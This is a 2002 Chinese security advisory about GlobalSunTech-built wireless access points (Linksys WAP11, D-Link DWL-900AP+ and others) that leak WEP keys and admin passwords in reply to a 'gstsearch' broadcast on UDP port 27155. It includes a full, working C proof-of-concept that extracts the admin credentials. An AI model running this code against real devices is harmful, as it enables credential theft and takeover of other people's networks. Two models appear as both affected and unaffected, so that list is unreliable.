首页 -> 安全研究

安全研究

安全漏洞
多家厂商无线接入点远程信息泄露漏洞

发布日期:2002-11-03
更新日期:2002-11-06

受影响系统:
Linksys WAP11
D-Link DWL-900AP+
GlobalSunTech WISECOM GL2422AP-0T
GlobalSunTech ALLOY GL-2422AP-S
GlobalSunTech EUSSO GL2422-AP
不受影响系统:
Linksys WAP11 2.2
D-Link DWL-900AP+ 2.2
D-Link DWL-900AP+ 2.1
GlobalSunTech ALLOY GL-2422AP-S
GlobalSunTech EUSSO GL2422-AP
描述:
GlobalSunTech公司开发多种OEM无线访问接入点设备,如Linksys、D-Link和其他产品。

GlobalSunTech开发的多种无线访问接入点设备对部分广播请求处理不正确,远程攻击者可以利用这个漏洞获得设备包含的敏感信息,包括管理员密码。

攻击者可以向无线访问接入点设备的UDP 27155端口发送包含"gstsearch"字符串的广播包,就可以导致设备返回包括WEB keys、MAC过滤和管理员密码等敏感信息。攻击者可以通过这些信息对设备进行进一步攻击和控制。

<*来源:Tom Knienieder (knienieder@khamsin.ch
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103644513327228&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Tom Knienieder(knienieder@khamsin.ch) 提供了如下测试程序:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
typedef struct {
        char type[28];
        char name[32];
        char user[16];
        char pass[16];
}
__attribute__ ((packed)) answer;
int main()
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer* ans = (answer *)rcvbuffer;
        int sd, ret, val;
        sin.sin_family          = AF_INET;
        sin.sin_addr.s_addr     = inet_addr("255.255.255.255");
        sin.sin_port            = htons(27155);
        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0)
                perror("socket");
        val = 1;
        ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
        if (ret < 0)
        {
                perror("setsockopt");
                exit(1);
        }
        ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
        if (ret < 0)
        {
                perror("sendto");
                exit(1);
        }
        ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
        printf("Type            : %s\n",ans->type);
        printf("Announced Name  : %s\n",ans->name);
        printf("Admin Username  : %s\n",ans->user);
        printf("Admin Password  : %s\n",ans->pass);
        return 0;
}

建议:
厂商补丁:

GlobalSunTech
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.globalsuntech.com

浏览次数:3661
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障